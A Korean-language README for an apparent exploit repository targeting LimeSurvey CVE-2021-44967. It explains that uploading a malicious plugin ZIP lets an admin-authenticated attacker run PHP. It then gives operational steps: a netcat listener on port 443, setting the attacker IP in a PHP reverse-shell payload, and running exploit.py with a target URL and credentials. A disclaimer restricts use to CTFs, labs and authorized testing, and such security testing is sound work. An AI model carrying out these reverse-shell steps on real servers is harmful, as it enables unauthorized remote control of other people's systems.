
🔥 Limesurvey용 자동화된 RCE 익스플로잇 (CVE-2021-44967). 권한 상승을 위한 최적화된 익스플로잇 체인. 🚀
이 저장소는 LimeSurvey의 인증된 원격 코드 실행 취약점인 CVE-2021-44967에 대한 기능적 익스플로잇을 포함합니다.
다음에서 테스트 및 작동 확인됨:
이 취약점은 관리 권한이 있는 인증된 사용자가 악성 플러그인을 업로드할 수 있게 합니다. LimeSurvey가 플러그인 ZIP의 내용을 엄격하게 검증하지 않거나 플러그인 디렉토리에서 PHP 파일의 실행을 방지하지 않기 때문에, 공격자는 업로드된 셸에 직접 접근하여 RCE를 달성할 수 있습니다.
config.xml이 업데이트되었습니다.머신에서 netcat 리스너를 시작하세요:
nc -lvnp 443
php-rev.php를 편집하고 로컬 IP와 포트를 설정하세요:
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
예시:
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py: 메인 자동화 스크립트.php-rev.php: PHP 리버스 셸 페이로드.config.xml: 필수 LimeSurvey 플러그인 구성 파일.이 도구는 교육 목적과 승인된 보안 테스트 전용입니다. 통제되고 합법적인 환경(예: CTF, 실험실 환경, 또는 승인된 계약)에서만 사용하도록 엄격히 의도되었습니다. 저자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 책임감 있게 사용하고, 명시적 허가를 받은 시스템에서만 테스트하십시오.